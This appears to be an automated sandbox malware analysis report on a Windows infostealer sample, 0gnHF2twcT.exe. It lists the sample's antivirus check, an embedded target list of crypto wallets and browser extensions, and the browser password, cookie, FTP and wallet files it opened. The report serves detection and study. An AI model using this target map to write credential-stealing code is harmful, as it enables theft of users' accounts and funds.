Source: 0gnHF2twcT.exe, 00000000.00000003.1661698239.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\0gnHF2twcT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
Source: 0gnHF2twcT.exe String found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},
Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: 0gnHF2twcT.exe String found in binary or memory: jfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: 0gnHF2twcT.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: number of queries: 1001
Source: Yara match File source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR